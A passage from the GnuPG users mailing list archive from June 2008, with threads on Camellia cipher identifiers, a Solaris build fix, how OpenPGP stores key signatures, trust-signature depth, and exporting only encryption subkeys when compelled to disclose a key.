vedaal, Camellia 128, 192 & 256 have been incorporated into the GnuPG Source already. They have been assigned the placeholders S11, S12 & S13 respectively. There are already 'hackers' [risk takers?] who have built GnuPG with these algorithms enabled. [Werner, David & Marcus collectively shudder] Until such time as these Algorithms are included in the 'preferences' on One's Key and that Key is disseminated there is no real 'danger'; however, once the Key is in circulation with those preferences listed on it then should the placeholder values later be changed and a Sender fails to 'refresh' Your Key from a reliable source then potential confusion could exist. :-\ I may be mis-reading Your question. Upon re-reading I am of the opinion that what You desire may already be covered with use of the preferred-algo-preference string placed within gpg.conf. Anyway, just My 2 cents and I shall wait until I am clearer on what You are suggesting. JOHN ;) Timestamp: Thursday 12 Jun 2008, 13:38 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIUV8HAAoJEBCGy9eAtCsP4oIH/iaqWJ+zigY0NkSj70Ij7c9z 6MVBnjKsBP4sXnJESBoK4oqhKNEC4JG31TPkdMveSraB+TWSdbsex+KbCPaDZQqQ PKwBS0yqOpzKnxsh1JA4LOfE5ODOebxKuDJjgJBqhZXjxGpQo7gK27MAmnW6B+3q K+SpVeY/uevBKB7Kie97+z4aukmXbeV/Bcgk3x43urbdazj9pGAi5k3VZi7Y1B4j xD8Mr6JYrs2hbKaLJEPuxeH4ppIPFlJuCgcefVqVfvcOjQsYHAaS1zSoXSAMcHrz kcFNMTPHqnh7UDq3Xhsod1oImQC/mFxXLFG8josY9RfSuilk0U1QyWCQ9qFOx+g= =4GuS -----END PGP SIGNATURE----- From vedaal at hush.com Thu Jun 12 23:52:42 2008 From: vedaal at hush.com (vedaal at hush.com) Date: Thu, 12 Jun 2008 17:52:42 -0400 Subject: Camellia Message-ID: <20080612215244.1E3F92003D@mailserver7.hushmail.com> John W. Moore III jmoore3rd at bellsouth.net wrote on Thu Jun 12 19:38:16 CEST 2008 : >I may be mis-reading Your question. yes, suggestion only, for a workaround, >Upon re-reading I am of the opinion >that what You desire may already be covered with use of the >preferred-algo-preference string placed within gpg.conf. no, that allows the user to choose which cipher to use for encryption to begin with my suggestion is *after* Camellia is enabled in a hacked version and unable to be decrypted in the hacked version when the message was encrypted using Camellia in a later version the problem with changing the name of the cipher in a later (open- pgp approved version) is that when the session key is retrieved from the public key encrypted packet, it needs to know what cipher it is to be plugged into to decrypt for the sake of illustration, let's say that a newer version that may be calling Camellia with the identifier of 13, the older version, which thinks that Camellia is 11, and is using 13 for yet another cipher, will not be able to decrypt the message from the newer version that used the identifier 13, because it is trying to use the session key with the wrong cipher my workaround suggestion, was similar to the solution for decryption of messages done with the throw-keyid option Disastry's last version of pgp 2.3i-multi-6, had two variations of the throw-keyid option: random keyid, and fake keyid in both variations, the keyid listed as part of the pgp message, was NOT the public key that the session key was encrypted to the gnupg option used to decrypt such messages, was --try-all-secrets similarly, as a workaround suggestion, if decryption doesn't work because the correct session key has the wrong cipher identifier, it could be still be decrypted by making an option of --try-all-ciphers (easier, because the passphrase doesn't have to be re-entered for each key ;- ) ) again, NOT a feature request for the gnupg development team :-) (am quite happy to wait for the 'official' version, whenever that may be) sorry if i didn't write it clearly in my earlier post vedaal any ads or links below this message are added by hushmail without my endorsement or awareness of the nature of the link -- Click here if you're tired of your job and want to increase your salary. http://tagline.hushmail.com/fc/Ioyw6h4dBjsaEn26hZilhUk9p4D3LoLePYM31pKYD9uMHRALWomYTl/ From classpath at arcor.de Fri Jun 13 01:04:49 2008 From: classpath at arcor.de (Morton D. Trace) Date: Fri, 13 Jun 2008 01:04:49 +0200 Subject: GNUPG 1.4.9 intallation fails on Solaris SunOS 5.10 In-Reply-To: <19319f700806111508k523122f5o73276b904ae72b19@mail.gmail.com> References: <19319f700806111508k523122f5o73276b904ae72b19@mail.gmail.com> Message-ID: <4851AB91.70500@arcor.de> Kush Asthana wrote: > Hi > > I am trying to install GNUPG 1.4.9 on solaris 5.10 with following versions > > sparc-sun-solaris2.10 > gcc v 3.4.3 > ld: Software Generation Utilities - Solaris Link Editors: 5.10-1.482 > > Following error is encountered evertime I do make before you run make you do a configure, ./configure AR=gar That did the trick, gar under solaris is gnu ar. the same should hold for m4 and all other gnu tools, I use open solaris bash-3.00$ uname -a SunOS solaris-devx 5.11 snv_64a i86pc i386 i86pc It works. bash-3.00$ gpg --version gpg (GnuPG) 1.4.8 Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Home: ~/.gnupg Supported algorithms: Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA Cipher: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224 Compression: Uncompressed, ZIP, ZLIB, BZIP2 bash-3.00$ Sincerely Morten From wk at gnupg.org Fri Jun 13 07:33:40 2008 From: wk at gnupg.org (Werner Koch) Date: Fri, 13 Jun 2008 07:33:40 +0200 Subject: Camellia In-Reply-To: <20080612215244.1E3F92003D@mailserver7.hushmail.com> (vedaal@hush.com's message of "Thu, 12 Jun 2008 17:52:42 -0400") References: <20080612215244.1E3F92003D@mailserver7.hushmail.com> Message-ID: <873anhhpaj.fsf@wheatstone.g10code.de> On Thu, 12 Jun 2008 23:52, vedaal at hush.com said: > pgp approved version) is that when the session key is retrieved > from the public key encrypted packet, it needs to know what cipher > it is to be plugged into to decrypt Use --{show,override}-session-key: $ gpg --show-session-key /dev/null [...] gpg: session key: `3:0F5933BF86E0D8A3155984577BB0DD6A' and then $ gpg --override-session-key 3:0F5933BF86E0D8A3155984577BB0DD6A y The '3' is the algorithm id - just change it. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From george.davidescu at gmail.com Fri Jun 13 17:07:12 2008 From: george.davidescu at gmail.com (bezna) Date: Fri, 13 Jun 2008 08:07:12 -0700 (PDT) Subject: Signatures stored as information inside a "public key"/certificate? Message-ID: <17825579.post@talk.nabble.com> Hello, I'm having a disagreement with someone over this. From what I've read, signatures on a "public key" or rather, a certificate, including the self-signature, are stored as a packet on that key. The important point: This data (IE all the signatures made on your certificate) is encoded on the certificate within that block of ASCII armoured text/binary data when it is exported for someone else to import in their keyring. Now I'm being told that signatures are not part of the certificate itself, but rather as data on the keyring, and that the "export" command in fact exports this additional data from your keyring and somehow attaches it to the public key to produce the ASCII armoured output or whatever. Similarily, I'm being told that when you upload your keys to a keyserver, what is in fact uploaded is your "keyring" and that this is where the signature data comes from. To me the latter view is false. I see the list of signatures as being a component of the certificates stored within the certificate, not somewhere else. When keys are uploaded to a server, you can filter out which keys you want uploaded; the notion of a "public keyring" to me is simply a set of public keys (certificates), with no extra data attached, or at least not the signatures. While it is possible to export multiple certificates at once in one block of text, this text contains just those certificates, not some "keyring" or meta-entity; the certificates then contain their respective signature data. Which is correct? Are signatures an inherent part of the key or are they stored extrinsically? George -- View this message in context: http://www.nabble.com/Signatures-stored-as-information-inside-a-%22public-key%22-certificate--tp17825579p17825579.html Sent from the GnuPG - User mailing list archive at Nabble.com. From classpath at arcor.de Fri Jun 13 17:35:36 2008 From: classpath at arcor.de (Morton D. Trace) Date: Fri, 13 Jun 2008 17:35:36 +0200 Subject: Signatures stored as information inside a "public key"/certificate? In-Reply-To: <17825579.post@talk.nabble.com> References: <17825579.post@talk.nabble.com> Message-ID: <485293C8.2030000@arcor.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 bezna wrote: > Hello, > > Which is correct? Are signatures an inherent part of the key or are they > stored extrinsically? > > > George i would put it this way, when I run gpg in command line mode I create a user ID and a secret key + a public key. that is assigned my real name and armored, Then I meet up at the keysigning party and they all verify it, later I think i can append other email addresses to the same private key, I don't know if i can assign a fake private name like Lordbyte Whirlfield or Dick Tracey or whatever, as long as you don't take the identity from someone else, your digital name can be whatever. but for privacy and spam and prevention of identity theft I hope that can be possible. Some people prefer not to put that on a keyserver, simply for preventing spam, and fraud. But I am only familiar to gnuPG, what is the case for a root certificate or exactly how that can be revoked I don't know. http://www.gnupg.org/gph/en/manual.html http://www.gnupg.org/gph/en/manual.html#CONCEPTS signatures are an inherent part of a key, but you can anytime create new keypairs, for any key you can assign a new artificial name. This is only my limited understanding of this, please correct me if I'm wrong. Morten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (SunOS) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkhSk8gACgkQ9ymv2YGAKVTKAQCeMB17XYXPxp5O4EkW4sl2U1nO IwcAn3GcCIDin8BaDHoOcs5Zw4khj6Wq =+WJ3 -----END PGP SIGNATURE----- From wk at gnupg.org Fri Jun 13 18:34:24 2008 From: wk at gnupg.org (Werner Koch) Date: Fri, 13 Jun 2008 18:34:24 +0200 Subject: Signatures stored as information inside a "public key"/certificate? In-Reply-To: <17825579.post@talk.nabble.com> (george.davidescu@gmail.com's message of "Fri, 13 Jun 2008 08:07:12 -0700 (PDT)") References: <17825579.post@talk.nabble.com> Message-ID: <87fxrhb8fj.fsf@wheatstone.g10code.de> On Fri, 13 Jun 2008 17:07, george.davidescu at gmail.com said: > Which is correct? Are signatures an inherent part of the key or are they > stored extrinsically? Lets clarify the terms: - In OpenPGP parlance a "certificate" (as used with X.509) is called a "keyblock". It is perfectly okay to use the term certificate for an OpenPGP public key block - it is the same concept. (Please ignore the fact that OpenPGP also has secret key blocks) A certificate/keyblock consists of several packets, at least one packet is a key and usually you see user ID packet and signature packets as well. This composition of packets makes up the certificate/keyblock. - People often use the term "key" and they usually mean the certificate/keyblock and not the packet with the actual key. - A "keyring" is used by some implementations to store certificates/keyblocks. RFC4880 says (3.6): A keyring is a collection of one or more keys in a file or database. Traditionally, a keyring is simply a sequential list of keys, but may be any suitable database. It is beyond the scope of this standard to discuss the details of keyrings or other databases. Back to your question: Signatures are stored in the keyblock. At least for OpenPGP compliant messages. OpenPGP defines only the interchange format; applications may store it differently. If you export an OpenPGP certificate it is entirely exported with some minor changes (for example signatures marked as non-exportable are removed). In contrast to X.509 the OpenPGP format allows for certain transformations of the certificate without rendering it invalid. The armor is just put at the end around the binary certificate/keyblock and only a transport encoding. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From rjh at sixdemonbag.org Fri Jun 13 18:37:28 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Fri, 13 Jun 2008 11:37:28 -0500 Subject: Signatures stored as information inside a "public key"/certificate? In-Reply-To: <17825579.post@talk.nabble.com> References: <17825579.post@talk.nabble.com> Message-ID: <4852A248.3000005@sixdemonbag.org> bezna wrote: > I'm having a disagreement with someone over this. From what I've > read, signatures on a "public key" or rather, a certificate, > including the self-signature, are stored as a packet on that key. The > important point: This data (IE all the signatures made on your > certificate) is encoded on the certificate within that block of ASCII > armoured text/binary data when it is exported for someone else to > import in their keyring. Yes. No. Neither. OpenPGP implementations are free to store data however they want. The GnuPG keyring file is just a sequence of OpenPGP octets and packets, but there's no reason why it needs to be this way. Honestly, I'd much rather the data was stored in some kind of easily parseable format, whether it be XML or a simple context-free grammar or what-have-you, but that's neither here nor there. It doesn't make any sense to talk about what's "stored on the keyring" versus what's "stored on the certificate". Neither is well-defined. The only thing that's well-defined is the interoperability format. If your question is really "how does GnuPG do this", well, that gets a bit different. GnuPG's keyring file is essentially a long chain of certificates stored in the interoperability format. If you want to export a key, it just grabs the relevant part of the keyring, strips out local signatures and other installation-specific data, and dumps that. The preceding is a simplification, but as far as I understand it is essentially accurate. dshaw or wk will certainly correct me if I'm wildly wrong, which has been known to happen from time to time. :) From george.davidescu at gmail.com Fri Jun 13 20:35:08 2008 From: george.davidescu at gmail.com (bezna) Date: Fri, 13 Jun 2008 11:35:08 -0700 (PDT) Subject: PGP doesn't import trust signatures w/ depth > 8 on keys exported with GPG Message-ID: <17829687.post@talk.nabble.com> Hi, I'm using PGP Desktop 9.8 and I noticed when I export a public key from GPG and import it in PGP, any trust signatures made on it with GPG and given a depth greater than 8 are lost. Presumably this is because of constraints within PGP, IE the maximum trust depth that can be set in PGP for a signature is 8. I was wondering if anyone can provide a rationalization for why this is? Ostensibly even a trust signature of depth 2 carries enormous power with it, but there is no such cap on GPG. Furthermore, why are signatures in GPG with a trust depth greater than 9 marked as a 'T' on listings, even though the depth of the signature still matters (e.g. a trust signature with a depth of 14 is still more powerful than one of depth 12, even though they're both labelled 'T'). Many thanks, George P.S. Sorry about the flurry of questions recently. I'm new to GPG and PGP, have searched the list archives but I'd like to have greater in-depth knowledge on some issues. -- View this message in context: http://www.nabble.com/PGP-doesn%27t-import-trust-signatures-w--depth-%3E-8-on-keys-exported-with-GPG-tp17829687p17829687.html Sent from the GnuPG - User mailing list archive at Nabble.com. From rjh at sixdemonbag.org Fri Jun 13 20:42:51 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Fri, 13 Jun 2008 13:42:51 -0500 Subject: PGP doesn't import trust signatures w/ depth > 8 on keys exported with GPG In-Reply-To: <17829687.post@talk.nabble.com> References: <17829687.post@talk.nabble.com> Message-ID: <4852BFAB.50306@sixdemonbag.org> bezna wrote: > I was wondering if anyone can provide a rationalization for why this > is? This is the GnuPG-Users list, not PGP-Users. Generally speaking, we are not experts on the internal workings of PGP. You're better off asking PGP Corporation. From dshaw at jabberwocky.com Fri Jun 13 21:03:24 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 15:03:24 -0400 Subject: PGP doesn't import trust signatures w/ depth > 8 on keys exported with GPG In-Reply-To: <17829687.post@talk.nabble.com> References: <17829687.post@talk.nabble.com> Message-ID: <20080613190323.GB3936@jabberwocky.com> On Fri, Jun 13, 2008 at 11:35:08AM -0700, bezna wrote: > > Hi, > > I'm using PGP Desktop 9.8 and I noticed when I export a public key from GPG > and import it in PGP, any trust signatures made on it with GPG and given a > depth greater than 8 are lost. Presumably this is because of constraints > within PGP, IE the maximum trust depth that can be set in PGP for a > signature is 8. > > I was wondering if anyone can provide a rationalization for why this > is? I could make a guess (8 is a huge depth already and so they capped it there to simplify things?), but it would really be just a guess. I suggest contacting the PGP folks and asking them. They're a very responsive company. Let us know what you find out. > Ostensibly even a trust signature of depth 2 carries enormous power with it, > but there is no such cap on GPG. Furthermore, why are signatures in GPG with > a trust depth greater than 9 marked as a 'T' on listings, even though the > depth of the signature still matters (e.g. a trust signature with a depth of > 14 is still more powerful than one of depth 12, even though they're both > labelled 'T'). This one I can answer, as I wrote that part of the code. The reason that GPG marks signatures with a depth greater than 9 as 'T' in a signature listing is simply because the signature listing is formatted, and I only had room for a single digit without reformatting the display. Thus, 'T' in this case just means "more than 9". Note that this is strictly a display convention, and the internal trust calculations use the real number of course. David From dshaw at jabberwocky.com Fri Jun 13 21:12:20 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 15:12:20 -0400 Subject: Camellia In-Reply-To: <48515F08.2010801@bellsouth.net> References: <20080612143926.1F21B118040@mailserver5.hushmail.com> <48515F08.2010801@bellsouth.net> Message-ID: <20080613191220.GC3936@jabberwocky.com> On Thu, Jun 12, 2008 at 01:38:16PM -0400, John W. Moore III wrote: > vedaal at hush.com wrote: > > > how hard would it be to write a patch for an option of > > --try-all-symmetrics > > or > > --use-symmetric-name > > that would ignore the cipher number and try all of them, > > or try only the one specified ? > > > > ( disclaimer: > > *not* a feature request for the gnupg team :-) > > > > only a workaround thought > > for the hackers who choose to enable Camellia now ) > > FWIW, vedaal, Camellia 128, 192 & 256 have been incorporated into the > GnuPG Source already. They have been assigned the placeholders S11, S12 > & S13 respectively. There are already 'hackers' [risk takers?] who have > built GnuPG with these algorithms enabled. [Werner, David & Marcus > collectively shudder] Well, I do reserve the right to point and laugh if someone ignores the warnings and ends up losing data (for cripes sake, GPG with Camellia even prints out a warning every time you run it). The Camellia draft has been submitted for sponsorship in the IETF (see it at http://www.ietf.org/internet-drafts/draft-ietf-openpgp-camellia-03.txt). Pretty soon there will be official Camellia support and the warnings will go away. David From dshaw at jabberwocky.com Fri Jun 13 21:39:20 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 15:39:20 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48502A51.5030804@rickv.com> References: <48502A51.5030804@rickv.com> Message-ID: <20080613193920.GA4107@jabberwocky.com> On Wed, Jun 11, 2008 at 03:41:05PM -0400, Rick Valenzuela wrote: > I'm now confused about creating a separate subkey for encrypting, as > opposed to creating one keypair that signs and encrypts. The example > I've seen around is that if you're set up the subkey way and the police > demand the private part of your key, you don't have to sacrifice your > primary key, which carries all your signatures. (I hope I said that > correctly.) The signatures are actually on both the primary key and your user IDs, but that's basically correct. > Well, I understood that as meaning I would have separate passphrases for > the subkey and the primary key: Apparently, that's not possible. So then > how would this police scenario play out? If supposing then that TSA or > some entity forces me to give up my passphrase for decryption purposes, > then I've compromised everything, no? GPG (somewhat) supports different passphrases on subkeys and primary keys. The catch is that it does not generate such a key itself, so if you want it, you have to generate it manually. An easy way to handle the police scenario you give is to remove the passphrase from your key, use --export-secret-subkeys to export just the subkeys to a file, then put the passphrase back on your key. Give the police the subkey file, and you're done. They then have the ability to decrypt, but don't have your primary key. That's just talking crypto, of course. If it ever comes down to this in the real world, I'd recommend talking to a good lawyer before you do anything. David From dshaw at jabberwocky.com Fri Jun 13 22:19:00 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 16:19:00 -0400 Subject: Remove public key from secret key In-Reply-To: References: Message-ID: <20080613201900.GB4107@jabberwocky.com> On Mon, Jun 09, 2008 at 11:46:28PM -0400, Ivan Peev wrote: > Hello Guys, > > Is there a way to export the secret key without the public key or remove the > public key from exported secret key? I'm trying the following scenario: > > 1. Encrypt data with particular public key on one machine. > 2. Decrypt data with related secret key on another machine. > > Basically I don't want someone to be able to generate data, which can be > decrypted with the related secret key. No. You can strip the public key data from the secret key, but then the key is unusable (it's not a "OpenPGP key" any longer) until you restore the public key data. David From dshaw at jabberwocky.com Fri Jun 13 23:42:55 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 13 Jun 2008 17:42:55 -0400 Subject: Questions about trust signatures In-Reply-To: <17789248.post@talk.nabble.com> References: <17789248.post@talk.nabble.com> Message-ID: <20080613214255.GD4107@jabberwocky.com> On Wed, Jun 11, 2008 at 04:10:28PM -0700, bezna wrote: > > Dear GnuPG users, > > I have some questions regarding use of the tsign command; please don't feel > you have to answer all of them at once, just one will do, although I'd like > to point out that the one most important to me is #1. I???ve been doing some > reading and experimentation with tsign and I think I have a handle on how > the mechanics of it work. > > A brief aside: David Shaw posted a message > (http://lists.gnupg.org/pipermail/gnupg-users/2005-May/025612.html ) > providing a link to an article which apparently explained trust signature > concepts well ( > http://download.cryptoex.com/documents/whitepaper/cex2003-pgp-in-unternehmen-en/Tech%20White%20Paper%202002%20-%20Using%20OpenPGP%20in%20Corporations.pdf > ). However, the link appears to be down and searches for the article have > turned up nothing. Does anyone (perhaps David himself) have a copy of it, or > know where I can obtain it? Thanks in advance; now, my questions: Internet Archive has it: http://web.archive.org/web/20050315031244/http://download.cryptoex.com/documents/whitepaper/cex2003-pgp-in-unternehmen-en/Tech+White+Paper+2002+-+Using+OpenPGP+in+Corporations.pdf You might also look around in the PGP.com white paper library for similar information. The PGP company bought the Cryptoex company a while back, so PGP may have migrated some of the white papers over to their own site. > 1) My first question revolves around its application in a real-life > scenario. Suppose we have a strictly hierarchical environment, where the > validation of certificates depends solely on CAs. In such a scenario, would > the users perform trust signatures of a certain level on the CAs, who would > then perform trust signatures on CAs lower in the hierarchy (and thus lower > in power, since with each link in the trust signature chain the ???trust > power??? represented by the depth allotted to the tsig diminishes until it > reaches 1, the terminal value, beyond which the trust chain cannot be > extended through empowering other users with tsigs). Consider the following > example: > > User 1 ??? tsig of depth 2 --> Root CA ??? tsig of depth 1 --> Subordinate CA ??? > regular signature --> User 2 > > Thus, through this chain of trust, User 2???s certificate appears valid to > User 1. A similar chain could be traced from User 2 to User 1, or between > any other two users in the organization, using the Root CA as a hub for > trust signatures; alternatively, only the subordinate CA could be the > trusted entity by the users, in the case where that CA is responsible for a > department and users don???t care about the validity of all the certificates > of users outside their own branch in the organization. > > So my first question is, have I understood the use of this command in a > real-world environment correctly? Yes, you have. > Are there other ways in which it could be > applied? Can it be applied in a non-hierarchical context? What I mean by > this is, is there some way to get rid of this ???depth??? functionality and to > be able to propagate trust continuously and indefinitely down a chain of > users, without having it diminish until it reaches an endpoint? For example > ( --> denotes a signature, ==> denotes trust) : > > A ==> B ==> C ==> D --> E > > Through this chain of trust, Eve???s certificate appears valid to Alice. The > implementation of this example using GPG trust signatures would involve > using descending orders (the ???depth??? parameter) of trust signatures with > each hop: > > A =3=> B =2=> C =1=> D --> E No. The problem here is the use of the word "indefinitely". Without the depth concept, anyone in the chain can make a signature beyond their "signing privilege" (for lack of a better term). For example, using the chain above, let's say that Alice is the regular user, Baker is the company-wide Root CA, Charlie is a VP, and Dorothy is a Manager, who manages Eve. Note now in the example you give above, Dorothy cannot issue a trust signature to Eve - just a regular signature. If there was no depth limiting it, Dorothy could go rogue and issue a trust signature to an attacker who could then issue more trust signatures, etc. The depth (along with the domain restriction) prevents people from further down in the chain from doing things that you, the head of the chain, (Alice in this example) don't want to accept. To be clear, note that nothing stops Dorothy from issuing such a signature. It's just that when resolving the chain **from the perspective of Alice**, Dorothy's signatures are limited to a single hop. Even if she issues a signature with a depth of 99, when looked at as part of the chain above, the depth will appear to be 1. When looked at from the perspective of someone else, the results may be different. > Obviously this ???depth??? parameter is better suited to the CA > example outlined earlier; it might not be possible for Alice (or any > other user in the chain) to know how many hops away Eve is, and what > depth to tsign Bob with so that she will validate Eve???s > certificate. Another way for Alice to handle the problem is rather than signing it, simply to mark the CA key as "ultimately trusted". This avoids Alice having to know the depth of the chain, as it will cause any signature by the CA to be treated as if it was issued by Alice herself. This can be thought of as a infinite-depth trust signature if you like. > Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own > purposes), the chain of trust linking Eve to Alice would be broken > since GPG computes certificate validity (and trust in the case of > tsigns) only down paths where each next node in the path was tsigned > with a lower ???depth??? than the ???depth??? of the tsign on the > node before it. The chain isn't broken, the depth at each step is just lowered to match the perspective of the head of the chain (Alice in this case). If Bob tsigns Carmen, then from Bob's perspective, that chain in the link had a depth of 4. Similarly, if Roger signs Bob's key with a depth of 5, then we have a new chain from Roger's perspective where the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it is lowered to match the maximum depth granted by Roger). If Roger signed Bob's key with a depth of 50, then the Bob->Carmen link has a depth of 4 (as it can't be larger than what Bob granted). > Is there some way to circumvent this in GPG, short of writing your own code? > Does the PGP Corporation???s program offer any alternatives? Both GPG and PGP handle this essentially the same way. You can always run with an external trust model by disabling trust in GPG, and doing the work externally, but it won't be compatible with the rest of the world. > That was the main question I wanted to address. Now, here are some other > issues I have with tsign: > > 2) I noticed that when two disjoint, continuous (not broken by a tsign > assigning only ???marginal??? trust somewhere) paths of tsigns of the same > length lead to the same certificate at the end of the path, the signature > which was last made is taken into computing that terminal certificate???s > trust rating, rather than some other criteria. This is hard to explain > without an example, so here it is: > > Root CA 1 --> CA 1 > / \ > A B --> C > \ / > Root CA 2 --> CA 2 > > Bob's certificate has been validated in two companies he works for. Alice > wishes to find the validity of Charlotte's certificate, who was signed by > Bob. She has tsigned the Root CAs of both companies (with a depth of 3 for > the sake of the example). Now, the subaltern CA (tsigned with a depth of 2) > of Company 1 has tsigned Bob (with a depth of 1) and specified that he was > fully trustworthy when it came to validating certificates. The subaltern CA > of Company 2 though, had also tsigned Bob but according to him Bob is only > marginally trustworthy. > > According to the current GPG implementation, CA2's signature which is the > most recent would be used in determining Bob's ownertrust in Alice's trust > database! Consequently Charlotte's certificate would appear marginally > valid. This to me seems flawed. If CA1's signature was made before CA2's > (assume CA1 is a procrastinator), then Bob would appear as fully trustworthy > to Alice and Charlotte would be validated. The fact that Bob's > trustworthyness to Alice hinges on which CA got his signature in last seems > like a bad approach to me. All approaches here are bad approaches, as one can always come up with an example where the answer you want contradicts the answer you want from another example. Most recent is at least consistent and reliable. > 4) What do the "12x" and "13x" mean in the following --with-colones > --list-sigs output? > > sig:::17:2E62D2D5026D69FA:2008-06-11::6 120::David:13x: > > sig:::17:1816F82A9DE5372F:2008-06-11::1 60::Larry:12x: It says how much the signer verified the key before signing it. It is really a cosmetic difference since GPG mainly ignores those numbers. See "--default-cert-level" in the manual for more. > 5) As in question 2, I noticed that if there are two disjoint paths of > tsigns that lead to the same certificate and one path is shorter (suppose > Root CA 2 signed Bob's certificate directly), the shorter path is preferred > over the longer one. Are there any other rules for determining which path of > tsigns is used, using criteria such as the level of certitude in the > signature (3 for "checked very carefully", 2 for "checked casually", or 1 > [or 0]), the depth of the signature, and so on? The only other "rule" I > seemed to find was the one mentioned in question 2, with the newest trust > signature winning over the older ones. Shorter wins. The reason for this is that a long chain is a fragile chain: each additional link adds risk of someone doing something untoward. David From rick at rickv.com Sun Jun 15 08:55:32 2008 From: rick at rickv.com (Rick Valenzuela) Date: Sun, 15 Jun 2008 02:55:32 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <20080613193920.GA4107@jabberwocky.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> Message-ID: <4854BCE4.7080204@rickv.com> Hah, good point. And should it ever come down to that, I hope access to a lawyer is possible (and worthwhile) at that point. But both your and Matt's suggestions are good to have in the playbook. The border trick is a pretty good precaution (groan). Rick David Shaw wrote: > An easy way to handle the police scenario you give is to remove the > passphrase from your key, use --export-secret-subkeys to export just > the subkeys to a file, then put the passphrase back on your key. Give > the police the subkey file, and you're done. They then have the > ability to decrypt, but don't have your primary key. > > That's just talking crypto, of course. If it ever comes down to this > in the real world, I'd recommend talking to a good lawyer before you > do anything. > > David From peter at digitalbrains.com Sun Jun 15 15:43:52 2008 From: peter at digitalbrains.com (Peter Lebbing) Date: Sun, 15 Jun 2008 15:43:52 +0200 Subject: Remove public key from secret key In-Reply-To: References: Message-ID: <48551C98.3070809@digitalbrains.com> Ivan Peev wrote: > Is there a way to export the secret key without the public key or remove > the public key from exported secret key? I'm trying the following scenario: > > 1. Encrypt data with particular public key on one machine. > 2. Decrypt data with related secret key on another machine. > > Basically I don't want someone to be able to generate data, which can be > decrypted with the related secret key. At least with RSA, the public key can be computed with just the secret key. So it would never be cryptographically secure, it only takes some effort on the part of the attacker to break the scheme. I obviously don't know your exact requirements, but instead of trying to make something designed to be public private, perhaps this will accomplish your goal: Create two keypairs, A and B. The machine mentioned under point 1. above has the public key of keypair A and the private key of keypair B. The machine mentioned under point 2. has the private key A and public key B. The program encrypting on machine 1. encrypts to key A and signs with key B. The program decrypting on machine 2. only accepts data encrypted to key A and /signed with key B/. Now someone with access to the keyring on machine 2. cannot create encrypted data that is accepted by the decryption program, because he cannot sign it with key B. HTH, Peter Lebbing. -- I'm using the GNU Privacy Guard (GnuPG) in combination with Enigmail. You can send me encrypted mail if you want some privacy. My key is available at http://wwwhome.ewi.utwente.nl/~lebbing/pubkey.txt From faramir.cl at gmail.com Sun Jun 15 20:31:20 2008 From: faramir.cl at gmail.com (Faramir) Date: Sun, 15 Jun 2008 14:31:20 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4854BCE4.7080204@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> Message-ID: <48555FF8.8060705@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Rick Valenzuela escribi?: > Hah, good point. And should it ever come down to that, I hope access to > a lawyer is possible (and worthwhile) at that point. But both your and > Matt's suggestions are good to have in the playbook. The border trick is > a pretty good precaution (groan). > > Rick > > David Shaw wrote: ... >> That's just talking crypto, of course. If it ever comes down to this >> in the real world, I'd recommend talking to a good lawyer before you >> do anything. Well, I suppose in most "civilized" countries you have the right to have access to a lawyer if you have legal troubles. But is it a good idea to keep in mind there are places where that is unlikely to work... Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIVV/4AAoJEMV4f6PvczxAjiIH/3pXpLc5g1rLu2dF0PGvIQvn fzmSpdLtm31SlochwmWLlUjzDQdJYmGfaDaGHU5R4Pe2dS9slgktunmUI+gkFgQW z+uk0ecDqk3CnRiCTlIp6cy1YJOlse3hISK6L24elaC9dPeUSNwx7QIVRTaimYsH 5DannnmLcO/E12yH47ZRDiv/sIV9gAf9NCgHdJfDZEWoZHWaH3LPPDUpIFvkTir3 c95BO/Y59PELE3f4Wv1pBPZMydV3XX2DgJkcm7q20sANfQTVrZyYIbkQwByrYVrg odBEKzF3UVvqytvwEBJhI4yb7Sl4RYaiiOJpcV0lhNnGdZeCS1/ZAJmW/80ot8M= =uILL -----END PGP SIGNATURE----- From j.lysdal at gmail.com Sun Jun 15 22:14:28 2008 From: j.lysdal at gmail.com (Jorgen Lysdal) Date: Sun, 15 Jun 2008 22:14:28 +0200 Subject: PGP bug? Does not recognize primary uid Message-ID: <48557824.6050508@gmail.com> I was just playing around with latest version of PGP (9.8.2) for Mac, imported my key from gpg. It appears that PGP does not recognize what uid is the primary one. It just shows the oldest first. Is there more than one way to specify primary uid, or is it just one of the endless waterfall of ridicules bugs in 